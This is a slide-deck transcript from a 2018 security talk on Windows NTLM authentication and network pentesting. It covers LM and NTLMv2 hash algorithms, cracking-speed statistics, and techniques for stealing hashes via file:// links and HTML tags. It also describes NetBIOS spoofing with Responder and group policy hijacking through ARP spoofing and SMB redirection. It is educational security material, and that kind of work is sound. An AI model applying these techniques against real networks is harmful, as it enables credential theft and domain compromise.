Your hash is mine!

20a280fca034a72b4918a2b824b34033?s=47 E K
April 05, 2018

Your hash is mine!

Talk on Windows network authentication mechanism and Windows network pentesting
Topics:
- NTLM
- Authentication mechanism
- Hash cracking
- Hash Stealing
- Browsers and NTLM
- NetBIOS Spoofing
- Group Policy Hijacking

20a280fca034a72b4918a2b824b34033?s=128

E K

April 05, 2018
Tweet

Transcript

  1. 3.

    Disclamer The information and expressed opinions are provided for educational

    research purposes only. The author is not liable in any way for the actions of other parties. Everyone is fully responsible for their own actions.
  2. 4.

    Windows network problem I've a project on Windows network hacking

    features: «NTLM. Book of the Dead» I'm continuing Alexey Turin work - «SMB Relay Bible» The project contains everything you may need to successfully pentest Windows networks (at least I think so:))
  3. 5.

    Agenda Theory Windows hash - what is it? Authentication mechanism

    Bruteforce Hash Stealing Windows Explorer Crafted Documents Browsers NetBios Spoofing Group Policy Hijacking Toolz
  4. 6.
  5. 7.

    NTLM Working for: Keeping passwords Authentication Single-Sing-On Security Impact: Lots

    of Windows network Lots of tricks You can gain control over servers and users It’s an easy way
  6. 8.

    Crypt: LM Example: 299BD128C1101FD6 Algorithm: 1. Convert all lower case

    characters to upper case ones 2. Pad password to 14 characters with NULL characters 3. Split the password to two 7-character chunks 4. Create two DES keys from each 7-character chunk 5. DES encrypt the string "KGS!@#$%" with these two chunks 6. Concatenate the two DES encrypted strings. This is the LM hash.
  7. 10.
  8. 11.

    NTLM V2 Default in Windows since Windows 2000. Example: admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a006

    4958dac6:5c7830315c7830310000000000000b45c67103d07d7b95ac d12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030 Algorithm: SC = 8-byte server challenge, random CC = 8-byte client challenge, random CC* = (X, time, CC2, domain name) v2-Hash = HMAC-MD5(NT-Hash, user name, domain name) LMv2 = HMAC-MD5(v2-Hash, SC, CC) NTv2 = HMAC-MD5(v2-Hash, SC, CC*) response = LMv2 | CC | NTv2 | CC*
  9. 12.

    Bruteforce statistics Hash Type Hardware Speed NetNTLMv2 GeForce GTX 770

    - 512/2048 MB GeForce GTX 1080 - 2048/8192 MB NetNTLMv2 154.4MH/s GeForce GTX 770 - 512/2048 MB GeForce GTX 1080 - 2048/8192 MB 35862.6MH/s 1559.7MH/s NetNTLMv1 GeForce GTX 770 - 512/2048 MB GeForce GTX 1080 - 2048/8192 MB NTLM 3449.7MH/s NTLM NetNTLMv1 1941.2MH/s 21724.4MH/s Thx @w34kp455 for statistics. Check weakpass.com We use
  10. 13.

    Bruteforce statistics Hash Type NetNTLMv2 Intel(R) Core(TM) i7-3520M 2.90GHz Intel(R)

    Core(TM) i7-4790 3.60GHz NetNTLMv2 4.38MH/s Intel(R) Core(TM) i7-3520M 2.90GHz Intel(R) Core(TM) i7-4790 3.60GHz 76.03MH/s 14.50MH/s NetNTLMv1 Intel(R) Core(TM) i7-3520M 2.90GHz Intel(R) Core(TM) i7-4790 3.60GHz NTLM 32.68MH/s NTLM NetNTLMv1 27.87MH/s 72.43MH/s Hardware Speed Thx @w34kp455 for statistics. Check weakpass.com We use
  11. 14.

    Bruteforce statistics Hash Type NetNTLMv2 GeForce GTX 1080 - 2048/8192

    MB Intel(R) Core(TM) i7-4790 3.60GHz NetNTLMv2 1559.7MH/s GeForce GTX 1080 - 2048/8192 MB Intel(R) Core(TM) i7-4790 3.60GHz 76.03MH/s 14.50MH/s NetNTLMv1 GeForce GTX 1080 - 2048/8192 MB Intel(R) Core(TM) i7-4790 3.60GHz NTLM 35862.6MH/s NTLM NetNTLMv1 21724.4MH/s 72.43MH/s Hardware Speed Thx @w34kp455 for statistics. Check weakpass.com We use
  12. 15.
  13. 17.

    Files For local networks only File may contains files on

    SMB share https://google.com -> file://ip/mycats.jpg
  14. 20.

    Browsers What browsers are we talking about? Internet Explorer Edge

    Scheme file:// and many-many HTML tags <img> <link> <body> <table> <form> https://github.com/ShikariSenpai/Leak-NTLM-hash-via-HTML
  15. 21.
  16. 23.

    Why do we need all this? Users Deanonymization NTLM Relay

    Password Brute force User services VPN Mail SMB Share AD PSExec (cmd) Microsoft account ….
  17. 24.

    NetBios Spoofing NetBIOS Name Service Let’s resolve the «Batya» name:

    Hosts file DNS NetBIOS Root of the problem - Broadcast request Anyone can respond to a request with address substitution https://github.com/SpiderLabs/Responder We use Responder
  18. 25.

    NetBios Spoofing NTLM relay attack Bruteforce!!! NetBIOS Spoofing, like DNS

    Spoofing - back to the past Resolve subdomain name (work for Win7) Incorrect subdomain name asdfa.domain.name Cookie Hijacking Session Fixation Set Cookie aaa.domain.name -> domain.name Cross-domain policies bypass *.domain.name Phishing
  19. 27.

    Croup Policy Hijacking Group policy is Microsoft’s core infrastructure for

    managing the configuration of both a user and computer in an enterprise Windows domain. DNS – Used to find the nearest domain controller RPC – Used to establish a secure channel with the domain controller make various RPC calls LDAP – Used to query the high level group policy configuration and which GPOs should be applied SMB – Used to get the full GPO content for each applicable GPO GPO with System privilege!
  20. 28.

    Croup Policy Hijacking LDAP singing ? SMB singing ? By

    default only for AD! High load on the network
  21. 29.

    Croup Policy Hijacking Hacker Network ‘A’ User Domain Controller Network

    ‘B’ DNS LDAP RPC SMB DNS LDAP RPC SMB SMB Fake SMB DNS LDAP RPC 20-90 min
  22. 30.

    Tools MWRLabs private scripts - ???? That scripts are private!

    Hey! Intercepter-NG - limited customization Some other tools on Github?
  23. 31.

    Our Tool Path of least resistance: Redirect SMB traffic -

    IPTables SMB ports and share - Samba ARP Spoofing - not included (use your favourite tool, e.g. arpspoof) Payloads - Metasploit or your custom binary Payload delivery method - Apache or SMB share https://github.com/whitel1st/GP_Hijack - 2 years ago
  24. 32.

    Warning! ARP Spoofing is very destructive Use attack on a

    small segment of the network (like 4 IP) IPTables redirect all SMB traffic (yep, it’s too destructive) We need contributors, who know how we can find the packages at a low level by policy update signatures What do you want? It’s path of least resistance :)
  25. 33.

    Where it works? Windows version Windows XP Windows Vista Windows

    7 Windows 8.1 Windows 8 ? Vulnerable Windows 10 For systems with last updates No No No No ?
  26. 34.

    Where it works? Windows version Windows Server 2016 Windows Server

    2012 R No Windows Server 2012 Windows Server 2003 R2 Windows Server 2008 R2 ? Vulnerable Windows Server 2003 For systems with last updates No ? ? ?
  27. 35.

    Out of scope More Windows Vulnerability NTLM Relay Hash Dumping

    Horizontal privilege escalation Vertical privilege escalations Toolz-toolz-toolz Anything else?
  28. 36.

    Useful links Leak NTLM hash via HTML https://github.com/ShikariSenpai/Leak-NTLM-hash-via-HTML VladikSS habrahabr:

    https://habrahabr.ru/post/306810 W.I.T.C.H., you can test your VM Windows host: http://witch.valdikss.org.ru Dictionary for bruteforce https://weakpass.com Responder https://github.com/SpiderLabs/Responder GP_Hijack tool https://github.com/whitel1st/GP_Hijack
  29. 37.

    Questions? @ShikariSenpai More information about «NTLM. Book of the Dead»

    project will appear in my twitter: Special thx @w34kp455, @sergeybelove, @antyurin, @whitel1st, @igc_iv